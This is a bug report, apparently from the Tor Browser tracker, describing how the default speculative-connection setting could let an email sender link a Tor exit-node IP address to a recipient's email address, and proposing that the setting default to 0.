'network.http.speculative-parallel-limit' default setting provides tracking-risk

'network.http.speculative-parallel-limit' default setting provides tracking-risk

(thanks to Yuri Khan for the original scenario - 2015-08-14 22:33:56 PDT)

Potential tracking scenario:

  • Attacker sends an e-mail to the Victim with a text around a URL
  • Victim leaves the cursor in the area of the text
  • Tor Browser speculatively connects to the destination URL in the email
  • the Attacker logs this attempts and assigns the exit-node IP-address to the Victims email address

The result is that the exit-node's IP-address can be linked with the e-mail address of the targetted victim. Which (in case of seizing a exit-node) can result in de-anonimizing the un-aware user behind it.

This is exploitable in the Tor browser because the default value of the pre-connections API ('network.http.speculative-parallel-limit') is 6

A fix to mitigate this problem is to set 'network.http.speculative-parallel-limit' to 0 by default.

References

Trac:
Username: RickGeex_

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information